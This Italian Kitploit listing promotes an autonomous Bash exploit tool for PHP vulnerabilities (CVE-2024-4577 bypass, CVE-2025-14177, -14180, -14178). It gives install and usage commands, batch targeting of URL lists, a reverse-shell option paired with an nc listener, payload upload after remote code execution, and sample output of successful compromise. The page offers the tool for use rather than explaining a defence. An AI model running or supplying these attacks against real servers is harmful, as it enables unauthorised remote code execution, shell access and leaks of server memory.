Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PHP_8.1.x_Exploit — Rilevamento automatizzato e sfruttamento di vulnerabilità critiche PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
Strumenti/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
RicognizioneScanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlCrawlerStrumento di Accesso Remoto
GitHub
1145 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
gl1tch0x1/php_8.1.x_exploit

PHP_8.1.x_Exploit

Rilevamento automatizzato e sfruttamento di vulnerabilità critiche PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Vedi Repository
Condividi

🚀 PHP CVE Autopilot

Rilevamento e sfruttamento automatici di vulnerabilità critiche di PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh è uno strumento di valutazione della sicurezza a file singolo, zero configurazione che rileva automaticamente endpoint PHP vulnerabili e sfrutta quattro CVE ad alto impatto che interessano le versioni di PHP precedenti alla 8.1.34 (rilasciata a dicembre 2024). Non richiede alcuna creazione manuale di payload – basta fornire un URL e lo script fa il resto, dal crawling all'esecuzione remota di codice. Completamente autopilota – rileva e sfrutta automaticamente senza richieste all'utente.

Funzionalità

  • Autopilota completamente autonomo – data una singola URL, esegue crawling, fingerprinting, test e sfruttamento senza interazione da parte dell'utente.
  • Scansione batch – carica un elenco di target ed esegui in parallelo.
  • Crawling avanzato – estrae link e moduli dalla home page per un rilevamento migliore.
  • Fingerprinting di sistema operativo e versione PHP – evita attacchi solo Windows su Linux, verifica la versione di PHP.
  • Bypass CVE-2024-4577 (iniezione di argomenti CGI su Windows)
    • Rileva e sfrutta endpoint PHP-CGI vulnerabili.
    • Reverse shell opzionale (one-liner PowerShell).
    • Due varianti di iniezione: standard -d e bypass con trattino morbido %AD.
  • CVE-2025-14177 – perdita di memoria heap tramite getimagesize()
    • Crea dinamicamente un JPEG malformato e lo invia automaticamente a qualsiasi endpoint di upload rilevato.
    • Rileva la memoria trapelata nelle risposte.
  • Scansione locale approfondita via RCE (quando CVE-2024-4577 viene sfruttato)
    • Carica uno scanner PHP leggero che verifica:
      • CVE-2025-14180 – dereferenziazione di puntatore NULL in PDO PostgreSQL.
      • CVE-2025-14178 – integer overflow in array_merge.
  • Crawling intelligente – estrae link e moduli per scoprire script CGI e pagine di upload.
  • Esecuzione parallela – usa parallel se disponibile, altrimenti ripiega senza problemi.
  • Modalità verbose e debug – visualizza ogni richiesta HTTP e decisione.
  • Generazione report – salva tutti i risultati in un file di testo.
  • Pulito e sicuro – i file temporanei vengono eliminati all'uscita, i timeout prevengono i blocchi.

Requisiti

DipendenzaScopoSolitamente installato?
bash 4.0+Interprete di scriptSì (Linux/macOS)
curlRichieste HTTPSì
grep, sed, awkElaborazione del testoSì
mktempCreazione di file temporaneiSì
(opzionale) parallelScansione batch più veloceNo (ma consigliato)
(opzionale) jqFormattazione output JSONNo

Nessun privilegio di root richiesto – lo strumento invia solo richieste HTTP e opzionalmente esegue una reverse shell (richiede un listener sulla tua macchina).

Installazione

git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

Utilizzo

Target singolo (più comune)

./PHP8.1.x_Exploit.sh -u http://target.example.com

Target singolo con reverse shell (CVE-2024-4577)

./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

Poi sulla tua macchina:

nc -lvnp 4444

Scansione batch di più target

./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

Esempio targets.txt:

http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

Modalità solo scansione (nessun tentativo di sfruttamento)

./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

Salva report su file

./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

Output verbose / debug

./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # very noisy

Come funziona (fasi)

FaseAzione
1Fingerprinting – sistema operativo e versione PHP da header e probe.
2Crawling – estrae gli attributi href e action dalla home page.
3Scoperta CGI – prova percorsi comuni e link trovati durante il crawling che sembrano CGI.
4Test CVE‑2024‑4577 – inietta sia payload -d che %AD; se ha successo, esegue comandi o invia una reverse shell.
5Scoperta endpoint di upload – controlla percorsi di upload comuni e qualsiasi modulo contenente "upload"/"image".
6Test CVE‑2025‑14177 – crea un JPEG malformato, lo invia in POST a ogni endpoint di upload, rileva perdite heap.
7Scansione interna approfondita – se si ottiene RCE, carica uno script PHP scanner e lo esegue per testare CVE‑2025‑14180 / CVE‑2025‑14178.
8Report – stampa un riepilogo e opzionalmente scrive su un file.

Opzioni della riga di comando (riferimento completo)

OpzioneDescrizione
-u URLURL di un singolo target (es. http://example.com/)
-l FILEFile batch con una URL per riga
--scan-onlySolo rilevamento – non sfruttare (niente reverse shell, niente upload di payload)
-o FILEScrive il report finale su FILE
--threads NNumero di thread paralleli per la scansione batch (predefinito: 5)
--timeout NTimeout HTTP in secondi (predefinito: 10)
--no-colorDisabilita l'output colorato
--verboseMostra avanzamento dettagliato
--debugMostra ogni richiesta HTTP (può esporre dati sensibili)
--revshell IP PORTTenta una reverse shell quando CVE‑2024‑4577 viene rilevata
-h, --helpMostra l'aiuto ed esce

CVE trattate in dettaglio

CVEGravitàImpattoVettore di sfruttamentoCorretta in
CVE‑2024‑4577 (bypass)CriticaRCEIniezione di argomenti CGI su Windows (mappatura trattino morbido)PHP 8.1.34
CVE‑2025‑14177Media/AltaPerdita di informazioni (memoria heap)JPEG malformato passato a getimagesize()PHP 8.1.34
CVE‑2025‑14180AltaDoS (dereferenziazione NULL)PDO PostgreSQL con prepared statement emulati + parametro malformato \x99PHP 8.1.34
CVE‑2025‑14178Alta (8.2)DoS / potenziale corruzione di memoriaarray_merge() con array enormi che causa integer overflowPHP 8.1.34

Nota: CVE‑2025‑14180 e CVE‑2025‑14178 possono essere rilevate con precisione solo dall'interno del server (test locali). Lo script raggiunge questo risultato caricando uno scanner dopo un exploit CGI riuscito.

📸 Output di esempio

[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)
Scarica lo strumento